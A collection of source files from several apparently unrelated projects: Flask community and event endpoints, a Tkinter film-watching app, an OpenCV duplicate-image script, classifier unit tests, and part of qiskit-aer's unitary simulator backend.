comJoinToken = communityQuery.joinToken
communityId = communityQuery.communityId
payLoad = {
'userId': userId,
'communityName': communityName,
'communityDescription': communityDescription,
'comJoinToken': comJoinToken,
'communityId': communityId,
'message': 'community-successfully-created'
}
return make_response(jsonify(payLoad), 201)
return make_response(jsonify(payLoad), 400)
@general_bp.route('/community/join', methods=['POST'])
def join_community():
token = request.headers.get('Authorization')
joinToken = request.json.get('joinToken')
if find_missing(token, joinToken):
payLoad = {
'message': 'missing-params'
}
elif malformed_length(
{
joinToken: [16, 32], # 22 exactly
}
):
payLoad = {
'message': 'bad-length-params'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
userId = decode_auth_token(token)
comJoinToken = Communities.query.filter_by(joinToken=joinToken).first()
if comJoinToken == None:
payLoad = {
'message': 'incorrect-join-token'
}
return make_response(jsonify(payLoad), 400)
elif py_boolean(comJoinToken.joinTokenValid) == False:
payLoad = {
'message': 'community-joining-is-closed'
}
return make_response(jsonify(payLoad), 403)
communityId = comJoinToken.communityId
        # a user may try to join the same community more than once
try:
userInCommunity = CommunityMembers.query.filter(CommunityMembers.userId==userId, CommunityMembers.communityId==communityId).first()
if userInCommunity != None:
payLoad = {
'message': 'you-are-already-in-this-community'
}
return make_response(jsonify(payLoad), 400)
except Exception as e:
print(str(e))
communityMember = CommunityMembers(userId, communityId)
db.session.add(communityMember)
db.session.commit()
payLoad = {
'userId': userId,
'communityId': communityId,
'message': 'community-successfully-joined'
}
return make_response(jsonify(payLoad), 200)
return make_response(jsonify(payLoad), 400)
# Set Event
@general_bp.route('/event/set', methods=['POST'])
def set_event():
"""
    Endpoint to create an Event; the event is put on hold if
    start_event is false.
    Required: Admin
    Returns: event hold status | auth fail
"""
token = request.headers.get('Authorization')
event_name_ = request.json.get('event_name')
event_description_ = request.json.get('event_description')
ending_time_delta_ = request.json.get('ending_time_delta')
location_range_ = request.json.get('location_range')
communityId_ = request.json.get('communityId') # How to get this is a creative part
latitude_ = request.json.get('latitude')
longitude_ = request.json.get('longitude')
broadcast_choice_ = request.json.get('broadcast_choice')
start_event_ = request.json.get('start_event') # New add_on
if find_missing(token, event_name_, ending_time_delta_, location_range_,
latitude_, longitude_, broadcast_choice_, start_event_, communityId_):
payLoad = {
'message': 'missing-params'
}
elif malformed_length(
{
token: [16, 1024],
event_name_: [3, 128],
event_description_: [0, 2048],
}
):
payLoad = {
'message': 'bad-length-params'
}
elif malformed_dtc(
{
ending_time_delta_: 'i',
location_range_: 'i',
latitude_: 'f',
longitude_: 'f',
communityId_: 'i'
}
):
payLoad = {
'message': 'bad-datatype'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
latitude_ = float(latitude_)
longitude_ = float(longitude_)
ending_time_delta_ = int(ending_time_delta_)
location_range_ = int(location_range_)
communityId_ = int(communityId_)
if py_boolean(broadcast_choice_):
broadcast_choice_ = 1
else:
broadcast_choice_ = 0
if py_boolean(start_event_):
start_event_ = 1
else:
start_event_ = 0
# check if user has that community registered under him/her and is Authorized
userId = decode_auth_token(token)
userEmail_ = Users.query.get(userId).userEmail
communityRegistered = [x.communityId for x in Communities.query.filter_by(userId=userId).all()]
if communityId_ not in communityRegistered:
payLoad = {
'message': 'You-Are-Not-Registered-as-Community-Head-for-this-company'
}
return make_response(jsonify(payLoad), 403)
# Getting OTP
otp_ = random_otp()
if otp_ == 'Fail':
payLoad = {
'message': 'OTP-Generation-Failed'
}
return make_response(jsonify(payLoad), 500)
creation_date_ = datetime.datetime.now()
if start_event_ == 1:
new_event = Events(creation_date= creation_date_, userEmail=userEmail_, \
otp=otp_, event_name=event_name_, event_description=event_description_, \
ending_time_delta=ending_time_delta_, location_range=location_range_, \
latitude=latitude_, longitude=longitude_, broadcast_choice=broadcast_choice_, \
communityId=communityId_)
db.session.add(new_event)
db.session.commit()
payLoad = {
'OTP': otp_,
'EventName': event_name_,
'EndingInMin': ending_time_delta_,
'CommunityId': communityId_,
'EventStarted': True,
'BroadcastChoice': broadcast_choice_,
'LocationValidInMeters': location_range_
}
return make_response(payLoad, 200) # Object of type Response is not JSON serializable
else: # else add it in hold
new_hold = HoldedEvents(creation_date= creation_date_, userEmail=userEmail_, \
otp=otp_, event_name=event_name_, event_description=event_description_, \
ending_time_delta=ending_time_delta_, location_range=location_range_, \
broadcast_choice=broadcast_choice_, communityId=communityId_)
db.session.add(new_hold)
db.session.commit()
payLoad = {
'OTP': otp_,
'EventName': event_name_,
'EndingInMin': ending_time_delta_,
'CommunityId': communityId_,
'EventStarted': False,
'BroadcastChoice': broadcast_choice_,
'LocationValidInMeters': location_range_
}
return make_response(payLoad, 201) # Object of type Response is not JSON serializable
return make_response(payLoad, 400)
# Holded Events View
@general_bp.route('/event/holded', methods=['POST'])
def view_holded():
"""
    Shows all held (not-yet-started) events; from here an event can be
    started, with its OTP passed dynamically to the start-event endpoint.
"""
token = request.headers.get('Authorization')
communityId_ = request.json.get('communityId') # Has to be passed
if find_missing(token, communityId_):
payLoad = {
'message': 'missing-params'
}
elif malformed_length(
{
            token: [16, 1024],
}
):
payLoad = {
'message': 'bad-length-params'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
userId = decode_auth_token(token)
userEmail_ = Users.query.get(userId).userEmail
holdedEvents = HoldedEvents.query.filter(HoldedEvents.userEmail==userEmail_, HoldedEvents.communityId == communityId_).all()
holdedEventsArray = []
for event in holdedEvents:
adder = {
"holdId": event.holdId,
"CreationDate": event.creation_date, #--todo-- improve the format
"OTP":event.otp,
"EventName": event.event_name,
"EventDescription": event.event_description,
"LocationValidInMeters": event.location_range,
"EndingInMin": event.ending_time_delta,
"BroadcastChoice": event.broadcast_choice,
"CommunityId": event.communityId
}
holdedEventsArray.append(adder)
payLoad = holdedEventsArray
return make_response(jsonify(payLoad), 200)
return make_response(jsonify(payLoad), 400)
# Start a held event
@general_bp.route('/event/start/<otpNumber>', methods=['POST'])
def start_event(otpNumber):
"""
    Starts an event that is currently present in the held events.
    POST body: latitude, longitude; header: auth token
"""
token = request.headers.get('Authorization')
latitude_ = request.json.get('latitude')
longitude_ = request.json.get('longitude')
holdedQuery = HoldedEvents.query.filter_by(otp=otpNumber).first()
otp_check = holdedQuery
    if otp_check in [None, '']:  # does not exist
payLoad = {
'Status': 'Fail',
'Reason': 'no-such-holded-event'
}
elif find_missing(token, latitude_, longitude_,):
payLoad = {
'message': 'missing-params',
'header': ['Authorization', ],
'body': ['latitude', 'longitude']
}
elif malformed_length(
{
token: [16, 1024],
}
):
payLoad = {
'message': 'bad-length-params'
}
elif malformed_dtc(
{
latitude_: 'f',
longitude_: 'f'
}
):
payLoad = {
'message': 'bad-datatype'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
latitude_ = float(latitude_)
longitude_ = float(longitude_)
communityId_ = holdedQuery.communityId
# check if user has that community registered under him/her and is Authorized
userId = decode_auth_token(token)
userEmail_ = Users.query.get(userId).userEmail
communityRegistered = [x.communityId for x in Communities.query.filter_by(userId=userId).all()]
if communityId_ not in communityRegistered:
payLoad = {
'message': 'You-Are-Not-Registered-as-Community-Head-for-this-company'
}
return make_response(jsonify(payLoad), 403)
creation_date_ = otp_check.creation_date
userEmail_ = otp_check.userEmail
otp_ = otpNumber
event_name_ = otp_check.event_name
event_description_ = otp_check.event_description
ending_time_delta_ = otp_check.ending_time_delta
location_range_ = otp_check.location_range
broadcast_choice_ = otp_check.broadcast_choice
communityId_ = otp_check.communityId
new_event = Events(creation_date= creation_date_, userEmail=userEmail_, \
otp=otp_, event_name=event_name_, event_description=event_description_, \
ending_time_delta=ending_time_delta_, location_range=location_range_, \
latitude=latitude_, longitude=longitude_, broadcast_choice=broadcast_choice_, \
communityId=communityId_)
db.session.add(new_event)
HoldedEvents.query.filter_by(otp=otpNumber).delete()
db.session.commit()
payLoad = {
'OTP': otp_,
'EventName': event_name_,
'EndingInMin': ending_time_delta_,
'CommunityId': communityId_,
'EventStarted': True,
'BroadcastChoice': broadcast_choice_,
'LocationValidInMeters': location_range_
}
return make_response(payLoad, 200)
return make_response(payLoad, 400)
``` |
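For orientation, a minimal client-side sketch of the registration/login flow defined above, assuming the `requests` library and a locally running server; the base URL and credential values are illustrative assumptions, and the JSON field names mirror the `request.json.get(...)` calls in the handlers.

```python
# Hypothetical client sketch for the /register/user, /login/user and /logout/user
# routes above. BASE_URL and the credentials are assumptions, not part of the app.
import requests

BASE_URL = "http://localhost:5000"  # assumed local dev server

register_body = {
    "userName": "alice",
    "userEmail": "alice@example.com",
    "userPassword": "s3cret-pass",
    "userPasswordConfirm": "s3cret-pass",
}
resp = requests.post(f"{BASE_URL}/register/user", json=register_body)
print(resp.status_code, resp.json())  # 201 and a token on success

login_body = {"userEmail": "alice@example.com", "userPassword": "s3cret-pass", "rememberMe": True}
token = requests.post(f"{BASE_URL}/login/user", json=login_body).json().get("token")

# The token is then sent as the Authorization header, e.g. for logout:
requests.get(f"{BASE_URL}/logout/user", headers={"Authorization": token})
```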
{
"source": "1UC1F3R616/D-Netflix",
"score": 3
} |
#### File: D-Netflix/D-Netflix_GUI/client_file_gui.py
```python
import webbrowser
import os
import time
import list_extractor as liex
from collections import Counter
import d_netflix_gui
from tkinter import *
import tkinter.ttk
from PIL import ImageTk, Image
import tkinter.messagebox
def on_entry_click1(event):
"""function that gets called whenever entry is clicked"""
if e1.get() == 'Username...':
e1.delete(0, "end") # delete all the text in the entry
e1.insert(0, '') #Insert blank for user input
e1.config(fg = 'black')
def on_focusout1(event):
if e1.get() == '':
e1.insert(0, 'Username...')
e1.config(fg = 'grey')
def on_entry_click2(event):
"""function that gets called whenever entry is clicked"""
if e2.get() == 'Password...':
e2.delete(0, "end") # delete all the text in the entry
e2.insert(0, '') #Insert blank for user input
e2.config(fg = 'black')
def on_focusout2(event):
if e2.get() == '':
e2.insert(0, 'Password...')
e2.config(fg = 'grey')
def choice():
def stats(self):
def thorough(self):
global client_id
global client_pass
def seen(self):
root4.destroy()
root4=Tk()
            l1=Label(root4, text="Client id: "+client_id+"\t\t"+"Client Password: "+client_pass+'\n'+"DateTime: "+time.ctime(), fg="blue")
l1.grid(row=0, column=0, padx=10, pady=10)
f = open("clients/"+client_id+'_'+client_pass+'.txt', "r")
ff = f.readlines()
f.close()
l2=Label(root4, text="Total "+str(len(ff))+" films have been watched so far.", fg="green yellow")
l2.grid(row=1, column=0, padx=10, pady=10)
text = [x.split('\t') for x in ff]
frequent = [x[1].replace('\n', '') for x in text]
counter = Counter(frequent).most_common(3)
            l3=Label(root4, text=client_id+" favourite films:", fg="gold")
l3.grid(row=2, column=0)
count3=3
for x in counter:
l4=Label(root4, text=x[0])
l4.grid(row=count3, column=0)
count3+=1
b1=Button(root4, text="CLOSE", fg="red", bg="black")
b1.grid(row=count3, column=0)
b1.bind("<Button-1>", seen)
root4.bind("<Return>", seen)
def frequency(self):
def seen(self):
root3.destroy()
root3=Tk()
global client_id
global client_pass
file = open("clients/"+client_id+'_'+client_pass+'.txt', "r")
file_text = file.readlines()
file.close()
text = [x.split('\t') for x in file_text]
frequent = [x[1].replace('\n', '') for x in text]
l1=Label(root3, text="Frequency\t Film:::")
l1.grid(row=0, column=0)
count2=1
for x in Counter(frequent):
l2=Label(root3, text=str(Counter(frequent)[x])+'\t\t'+x, fg="brown")
l2.grid(row=count2, column=0)
count2+=1
b1=Button(root3, text="CLOSE", fg="red", bg="black")
b1.bind("<Button-1>", seen)
b1.grid(row=count2, column=0, columnspan=2)
root3.bind("<Return>", seen)
root2=Tk()
root2.title("^_^FILM STATS^_^")
root2.geometry("400x60")
b1=Button(root2, text="WATCH FREQUENCY", fg="green", bg="CadetBlue1")
b1.pack(fill=BOTH)
b1.bind("<Button-1>", frequency)
b2=Button(root2, text="THOROUGH STATS", fg="green", bg="CadetBlue1")
b2.pack(fill=BOTH)
b2.bind("<Button-1>", thorough)
def history(self):
global client_id
global client_pass
def seen(self):
root2.destroy()
file = open("clients/"+client_id+'_'+client_pass+'.txt', "r")
file_text = file.readlines()
file.close()
file_text.reverse()
root2=Tk()
root2.title("HISTORY")
l1=Label(root2, text="DateTime \tFilm:::")
l1.grid(row=0, column=0)
count=1
for line in file_text:
l2=Label(root2, text=line, fg="brown")
l2.grid(row=count, column=0)
count+=1
b1 = Button(root2, text="CLOSE", fg="red", bg="black", relief="groove")
b1.grid(row=count, column=0, columnspan=2)
b1.bind("<Button-1>", seen)
root2.bind("<Return>", seen)
def watch(self):
def see(self):
global client_id
global client_pass
title=e1.get()
root2.geometry("450x250")
file = open('dsap_92det.txt', "r")
file_text = file.readlines()
file.close()
file_r_text = liex.cleaner(file_text)
for line in file_r_text:
if line[1]==title:
file = open("clients/"+client_id+'_'+client_pass+'.txt', "a+")
file.write(time.ctime()+'\t '+title+'\n')
collect = open("collective.txt", "a+")
collect.write(time.ctime()+'\t '+title+'\n')
collect.close()
file.close()
webbrowser.open(line[0])
root2.destroy()
break
else:
tkinter.messagebox.showinfo("Film Not Present", title+" is not present")
root2.destroy()
watch(self)
root2 = Tk()
root.title("FILM TIME")
l1 = Label(root2, text="TITLE", padx=10, pady=10)
l1.grid(row=0, column=0)
e1 = Entry(root2, width=20)
e1.grid(row=0, column=1, columnspan=2)
e1.focus_set()
b1 = Button(root2, text="Lit", fg="red", bd=1, padx=10, pady=10)
b1.grid(row=1, column=0, rowspan=2, columnspan=2)
b1.bind("<Button-1>", see)
root2.bind("<Return>", see)
root=Tk()
root.title("CLIENT MAIN-MENU")
def seen(self):
root.destroy()
d_netflix_gui.greet()
img = ImageTk.PhotoImage(Image.open("watch1.png"))
#b1 = Button(root, text="WATCH", bg="dark violet", fg="snow", cursor="mouse", relief="raised", command=watch)
b1 = Button(root, image=img, cursor="mouse", relief="raised", padx=10, pady=20)
b1.bind("<Button-1>", watch)
b1.image=img
b1.grid(row=0, column=0)
#b2 = Button(root, text="HISTORY", bg="dark violet", fg="snow", cursor="mouse", relief="raised")
img = ImageTk.PhotoImage(Image.open("history1.png"))
b2 = Button(root, image=img, cursor="mouse", relief="raised", padx=10, pady=20)
b2.bind("<Button-1>", history)
b2.image=img
b2.grid(row=1, column=0)
#b3 = Button(root, text="STATS", bg="dark violet", fg="snow", cursor="mouse", relief="raised")
img = ImageTk.PhotoImage(Image.open("stats1.png"))
b3 = Button(root, image=img, cursor="mouse", relief="raised", padx=10, pady=20)
b3.bind("<Button-1>", stats)
b3.image=img
b3.grid(row=2, column=0)
img = ImageTk.PhotoImage(Image.open("exit1.png"))
#b4 = Button(root, text="EXIT CLIENT", bg="dark violet", fg="snow", cursor="mouse", relief="raised", command=turn_back)
b4 = Button(root, image=img, cursor="mouse", relief="raised", padx=10, pady=20)
b4.bind("<Button-1>", seen)
b4.image=img
b4.grid(row=3, column=0)
def login():
root = Tk()
root.title("Client Login")
l1 = Label(root, text="NAME", fg="goldenrod", font ="Purisa")
l1.grid(row=0, stick=W)
l2 = Label(root, text="PASS", fg="goldenrod", font ="Purisa")
l2.grid(row=1, stick=W, columnspan=1)
global e1
global e2
e1 = Entry(root)
e1.insert(0, 'Username...')
e1.bind('<FocusIn>', on_entry_click1)
e1.bind('<FocusOut>', on_focusout1)
e1.config(fg = 'grey')
e1.grid(row=0, column=1)
e1.focus_set()
e2 = Entry(root)
e2.insert(0, 'Password...')
e2.bind('<FocusIn>', on_entry_click2)
e2.bind('<FocusOut>', on_focusout2)
e2.config(fg = 'grey')
e2.grid(row=1, column=1)
e2.focus_set()
def login2(self):
global client_id
global client_pass
client_id = e1.get()
client_pass = e2.get()
flag = 1
for file in os.listdir("clients"):
if file == client_id+'_'+client_pass+'.txt':
l3=Label(root, text="Welcome "+client_id, fg="cyan", font ="Purisa")
l3.grid(row=3)
flag=0
root.destroy()
choice()
if flag:
l4=Label(root, text="Invalid credentials!", fg="gray1", font ="Purisa")
l4.grid(row=3)
b1 = Button(root, text="LOGIN", bg="RoyalBlue1", fg="red", cursor="man", relief="groove")
b1.bind('<Button-1>', login2)
root.bind('<Return>', login2)
b1.grid(columnspan=2)
logo=Label(root, text="DN", font=("Symbol", 20), fg="red4", borderwidth=5, relief="groove")
logo.grid(row=0, column=2, rowspan=2, columnspan=2, ipadx=5, ipady=5, padx=13, pady=13)
root.mainloop()
def start():
login()
if __name__ == "__main__":
start()
```
#### File: D-NETFLIX__review_3/D-Netflix_CLI/start_file.py
```python
import server_file
import client_file
def greet():
print("Hi! This is D-Netflix, A simple application based on Stack and queue.")
print("New user may refer to User_guide firstly.\n\n")
def side():
print("Are you a Client or Server?")
print("Press 'C' or 'c' for client and hit enter.")
print("Press 'S' or 's' for server and hit enter.")
side_var = input()
print()
if side_var in ('S', 's'):
server_file.start()
# Server will be started
elif side_var in ('C', 'c'):
client_file.start()
# Client will be started
else:
print("Invalid choice\n")
side()
``` |
{
"source": "1UC1F3R616/Duplicate-Images-Detection-using-Parallel-Processing",
"score": 3
} |
#### File: Duplicate-Images-Detection-using-Parallel-Processing/Data Generating Scripts/single_core_data_gen.py
```python
import cv2
import numpy as np
import glob
import time
import multiprocessing
import threading
"""
Sequential version, running on a single core
"""
def filebrowser(ext='', directory=''):
"""
returns files with an extension
"""
return [f for f in glob.glob(f"{directory}**/*{ext}", recursive=True)]
image_dir = filebrowser(ext='.jpeg', directory='') # directory='' ==> search images from current to inner sub-directories
image_dir += filebrowser(ext='.jpg', directory='')
## print(image_dir)
image_name = 'c2.jpeg' # original image path goes here
original = cv2.imread(image_name)
start_time = time.time()
time_list = ()
image_count = 1
image_count_list = ()
for image_ in image_dir:
try:
image_to_compare = cv2.imread(image_)
if original.shape == image_to_compare.shape:
difference = cv2.subtract(original, image_to_compare)
b, g, r = cv2.split(difference)
if cv2.countNonZero(b) == 0 and cv2.countNonZero(g) == 0 and cv2.countNonZero(r) == 0:
sift = cv2.xfeatures2d.SIFT_create()
kp_1, desc_1 = sift.detectAndCompute(original, None)
kp_2, desc_2 = sift.detectAndCompute(image_to_compare, None)
index_params = dict(algorithm=0, trees=5)
search_params = dict()
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(desc_1, desc_2, k=2)
good_points = []
for m, n in matches:
if m.distance < 0.6*n.distance:
good_points.append(m)
# Define how similar they are
number_keypoints = 0
if len(kp_1) <= len(kp_2):
number_keypoints = len(kp_1)
else:
number_keypoints = len(kp_2)
time_list += (round(time.time() - start_time, 5), )
image_count_list += (image_count, )
image_count += 1
except Exception as e:
pass
print("--- %s seconds ---" % (time.time() - start_time))
print('Program Executed Completely')
print(time_list)
print(image_count_list)
``` |
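The script above collects `good_points` and `number_keypoints` but never reports a similarity figure; the following is a minimal sketch (not part of the original script) of how those values are commonly turned into a percentage.

```python
# Hypothetical helper, assuming the good_points list and number_keypoints count
# computed in the loop above.
def similarity_percent(good_points, number_keypoints):
    """Ratio of 'good' FLANN matches to the smaller keypoint count, as a percentage."""
    if number_keypoints == 0:
        return 0.0
    return len(good_points) / number_keypoints * 100

# e.g. inside the loop, after number_keypoints is computed:
# print("Similarity:", similarity_percent(good_points, number_keypoints), "%")
```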
{
"source": "1UC1F3R616/quicktext",
"score": 3
} |
#### File: quicktext/tests/test_text_classifier.py
```python
import unittest
import en_core_web_md
import torch
from quicktext import TextClassifier
class TextClassifierTester(unittest.TestCase):
def test_init(self):
nlp = en_core_web_md.load()
classifier = TextClassifier(nlp.vocab, n_classes=2)
self.assertTrue(isinstance(classifier, TextClassifier))
def test_predict(self):
nlp = en_core_web_md.load()
classifier = TextClassifier(nlp.vocab, n_classes=2)
text = "Sample text to test the classifier"
output = classifier.predict(text)
self.assertTrue(isinstance(output.data, torch.Tensor))
def test_get_ids(self):
nlp = en_core_web_md.load()
classifier = TextClassifier(nlp.vocab, n_classes=2)
text = "Sample text to test the classifier"
ids = classifier.get_ids(text)
self.assertTrue(isinstance(ids, list))
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "1ucas/puc-arq-big-data",
"score": 3
} |
#### File: 1ucas/puc-arq-big-data/exe1.py
```python
import mincemeat
import glob
import csv
text_files = glob.glob('C:\\Userx\\Exerc\\Textos\\*')
def file_contents(file_name):
f = open(file_name)
try:
return f.read()
finally:
f.close()
source = dict((file_name, file_contents(file_name))for file_name in text_files)
def mapfn(k, v):
    print('map ' + k)
from stopwords import allStopWords
for line in v.splitlines():
for word in line.split():
if( word not in allStopWords ):
yield word, 1
def reducefn(k, v):
    print('reduce ' + k)
return sum(v)
s = mincemeat.Server()
s.datasource = source
s.mapfn = mapfn
s.reducefn = reducefn
results = s.run_server(password="<PASSWORD>")
w = csv.writer(open("C:\\Userx\\Exerc\\RESULT.csv", "w"))
for k, v in results.items():
w.writerow([k, v])
``` |
{
"source": "1uci3n/leetcode",
"score": 3
} |
#### File: leetcode/#14/#14_self.py
```python
class Solution:
def longestCommonPrefix(self, strs: List[str]) -> str:
num_strs = len(strs)
min_len = len(strs[0])
if num_strs == 1:
return strs[0]
for i in range(1, num_strs):
if min_len > len(strs[i]):
min_len = len(strs[i])
prefix = ""
for i in range(min_len):
current_str = strs[0][i]
for j in range(1, num_strs):
if current_str != strs[j][i]:
return prefix
prefix += current_str
return prefix
```
#### File: leetcode/#303/#303_self.py
```python
class NumArray:
def __init__(self, nums: List[int]):
self.nums = nums
def sumRange(self, i: int, j: int) -> int:
result = 0
for m in range(i, j + 1):
result += self.nums[m]
return result
# Your NumArray object will be instantiated and called as such:
# obj = NumArray(nums)
# param_1 = obj.sumRange(i,j)
```
#### File: leetcode/#304/#304_self.py
```python
class NumMatrix:
def __init__(self, matrix: List[List[int]]):
self.matrix = matrix
self.sum_matrix = []
for i in range(len(matrix)):
temp = []
temp_sum = 0
for j in range(len(matrix[0])):
temp.append(temp_sum)
temp_sum += matrix[i][j]
self.sum_matrix.append(temp)
def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:
        result = 0
        for i in range(row1, row2 + 1):
            result += self.sum_matrix[i][col2] - self.sum_matrix[i][col1] + self.matrix[i][col2]
        return result
# Your NumMatrix object will be instantiated and called as such:
# obj = NumMatrix(matrix)
# param_1 = obj.sumRegion(row1,col1,row2,col2)
```
#### File: leetcode/#485/#485_self_2.py
```python
class Solution(object):
def findMaxConsecutiveOnes(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
max_num = 0
current_num = 0
for i in nums:
if i == 1:
current_num += 1
else:
if current_num > max_num:
max_num = current_num
current_num = 0
if current_num > max_num:
max_num = current_num
return max_num
```
#### File: leetcode/#561/#561_self.py
```python
class Solution(object):
def arrayPairSum(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
        n = len(nums) // 2
# a = [nums[0]]
# for i in range(1, len(nums)):
# if nums[i] <= a[0]:
# a.insert(0, nums[i])
# continue
# for j in range(0, len(a) - 1):
# if (nums[i] > a[j]) & (nums[i] <= a[j + 1]):
# a.insert(j+1, nums[i])
# break
# if nums[i] > a[-1]:
# a.insert(len(a), nums[i])
sums = 0
a = sorted(nums)
for i in range(n):
sums += a[i * 2]
return sums
```
#### File: leetcode/#995/#995_self.py
```python
class Solution(object):
def minKBitFlips(self, A, K):
"""
:type A: List[int]
:type K: int
:rtype: int
"""
        # Times out because this approach is O(N*K)
counter = 0
for i in range(len(A) - K + 1):
if A[i] == 0:
for j in range(K):
A[i + j] = inv(A[i + j])
counter += 1
for i in range(1, K + 1):
if A[-i] == 0:
return -1
return counter
def inv(num):
if num == 0:
return 1
else:
return 0
``` |
{
"source": "1ucian0/qiskit-aer",
"score": 2
} |
#### File: aer/backends/unitary_simulator.py
```python
import logging
from math import log2, sqrt
from qiskit.util import local_hardware_info
from qiskit.providers.models import QasmBackendConfiguration
from .aerbackend import AerBackend
from ..aererror import AerError
# pylint: disable=import-error
from .controller_wrappers import unitary_controller_execute
from ..version import __version__
# Logger
logger = logging.getLogger(__name__)
class UnitarySimulator(AerBackend):
"""Ideal quantum circuit unitary simulator.
**Backend options**
The following backend options may be used with in the
``backend_options`` kwarg for :meth:`UnitarySimulator.run` or
``qiskit.execute``.
* ``"initial_unitary"`` (matrix_like): Sets a custom initial unitary
matrix for the simulation instead of identity (Default: None).
* ``"validation_threshold"`` (double): Sets the threshold for checking
if initial unitary and target unitary are unitary matrices.
(Default: 1e-8).
* ``"zero_threshold"`` (double): Sets the threshold for truncating
small values to zero in the result data (Default: 1e-10).
* ``"max_parallel_threads"`` (int): Sets the maximum number of CPU
cores used by OpenMP for parallelization. If set to 0 the
maximum will be set to the number of CPU cores (Default: 0).
* ``"max_parallel_experiments"`` (int): Sets the maximum number of
qobj experiments that may be executed in parallel up to the
max_parallel_threads value. If set to 1 parallel circuit
execution will be disabled. If set to 0 the maximum will be
automatically set to max_parallel_threads (Default: 1).
* ``"max_memory_mb"`` (int): Sets the maximum size of memory
to store a state vector. If a state vector needs more, an error
is thrown. In general, a state vector of n-qubits uses 2^n complex
values (16 Bytes). If set to 0, the maximum will be automatically
set to half the system memory size (Default: 0).
* ``"statevector_parallel_threshold"`` (int): Sets the threshold that
2 * "n_qubits" must be greater than to enable OpenMP
parallelization for matrix multiplication during execution of
an experiment. If parallel circuit or shot execution is enabled
this will only use unallocated CPU cores up to
max_parallel_threads. Note that setting this too low can reduce
performance (Default: 14).
"""
MAX_QUBIT_MEMORY = int(log2(sqrt(local_hardware_info()['memory'] * (1024 ** 3) / 16)))
DEFAULT_CONFIGURATION = {
'backend_name': 'unitary_simulator',
'backend_version': __version__,
'n_qubits': MAX_QUBIT_MEMORY,
'url': 'https://github.com/Qiskit/qiskit-aer',
'simulator': True,
'local': True,
'conditional': False,
'open_pulse': False,
'memory': False,
'max_shots': int(1e6), # Note that this backend will only ever
# perform a single shot. This value is just
# so that the default shot value for execute
# will not raise an error when trying to run
# a simulation
'description': 'A C++ unitary simulator for QASM Qobj files',
'coupling_map': None,
'basis_gates': [
'u1', 'u2', 'u3', 'cx', 'cz', 'id', 'x', 'y', 'z', 'h', 's', 'sdg',
't', 'tdg', 'swap', 'ccx', 'unitary', 'diagonal', 'cu1', 'cu2',
'cu3', 'cswap', 'mcx', 'mcy', 'mcz', 'mcu1', 'mcu2', 'mcu3',
'mcswap', 'multiplexer',
],
'gates': [{
'name': 'u1',
'parameters': ['lam'],
'conditional': True,
'description': 'Single-qubit gate [[1, 0], [0, exp(1j*lam)]]',
'qasm_def': 'gate u1(lam) q { U(0,0,lam) q; }'
}, {
'name': 'u2',
'parameters': ['phi', 'lam'],
'conditional': True,
'description':
'Single-qubit gate [[1, -exp(1j*lam)], [exp(1j*phi), exp(1j*(phi+lam))]]/sqrt(2)',
'qasm_def': 'gate u2(phi,lam) q { U(pi/2,phi,lam) q; }'
}, {
'name':
'u3',
'parameters': ['theta', 'phi', 'lam'],
'conditional':
True,
'description':
'Single-qubit gate with three rotation angles',
'qasm_def':
'gate u3(theta,phi,lam) q { U(theta,phi,lam) q; }'
}, {
'name': 'cx',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled-NOT gate',
'qasm_def': 'gate cx c,t { CX c,t; }'
}, {
'name': 'cz',
'parameters': [],
'conditional': True,
'description': 'Two-qubit Controlled-Z gate',
'qasm_def': 'gate cz a,b { h b; cx a,b; h b; }'
}, {
'name': 'id',
'parameters': [],
'conditional': True,
'description': 'Single-qubit identity gate',
'qasm_def': 'gate id a { U(0,0,0) a; }'
}, {
'name': 'x',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-X gate',
'qasm_def': 'gate x a { U(pi,0,pi) a; }'
}, {
'name': 'y',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-Y gate',
'qasm_def': 'TODO'
}, {
'name': 'z',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Pauli-Z gate',
'qasm_def': 'TODO'
}, {
'name': 'h',
'parameters': [],
'conditional': True,
'description': 'Single-qubit Hadamard gate',
'qasm_def': 'TODO'
}, {
'name': 's',
'parameters': [],
'conditional': True,
'description': 'Single-qubit phase gate',
'qasm_def': 'TODO'
}, {
'name': 'sdg',
'parameters': [],
'conditional': True,
'description': 'Single-qubit adjoint phase gate',
'qasm_def': 'TODO'
}, {
'name': 't',
'parameters': [],
'conditional': True,
'description': 'Single-qubit T gate',
'qasm_def': 'TODO'
}, {
'name': 'tdg',
'parameters': [],
'conditional': True,
'description': 'Single-qubit adjoint T gate',
'qasm_def': 'TODO'
}, {
'name': 'swap',
'parameters': [],
'conditional': True,
'description': 'Two-qubit SWAP gate',
'qasm_def': 'TODO'
}, {
'name': 'ccx',
'parameters': [],
'conditional': True,
'description': 'Three-qubit Toffoli gate',
'qasm_def': 'TODO'
}, {
'name': 'cswap',
'parameters': [],
'conditional': True,
'description': 'Three-qubit Fredkin (controlled-SWAP) gate',
'qasm_def': 'TODO'
}, {
'name': 'unitary',
'parameters': ['matrix'],
'conditional': True,
'description': 'N-qubit arbitrary unitary gate. '
'The parameter is the N-qubit matrix to apply.',
'qasm_def': 'unitary(matrix) q1, q2,...'
}, {
'name': 'diagonal',
'parameters': ['diag_elements'],
'conditional': True,
'description': 'N-qubit diagonal unitary gate. The parameters are the'
' diagonal entries of the N-qubit matrix to apply.',
'qasm_def': 'TODO'
}, {
'name': 'cu1',
'parameters': ['lam'],
'conditional': True,
